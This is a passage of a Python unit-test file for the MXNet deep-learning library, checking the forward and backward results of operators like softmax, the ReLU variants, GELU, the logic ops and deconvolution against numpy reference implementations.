X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad, np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
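# FullyConnected flattens all trailing axes of the input by default, so the (5, 5, 5, 13)
# batch below becomes (5, 325) and is paired with a (num_hidden, 325) weight; the numpy
# reference reproduces exactly that flattened matmul plus bias.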
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
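# The constants below are the standard SELU parameters (alpha, lambda) from the
# self-normalizing neural networks formulation: selu(x) = lambda * x for x > 0 and
# lambda * alpha * (exp(x) - 1) for x <= 0, which is what fselu/fselu_grad implement.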
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
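# This exercises the tanh approximation of GELU:
#   gelu(x) ~= 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x^3)))
# fgelu/fgelu_grad below implement that approximation and its analytic derivative, which
# the symbolic forward/backward results are compared against.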
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
# the gradient of sign() is zero everywhere, regardless of the incoming gradient
npout_grad = np.zeros(shape)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
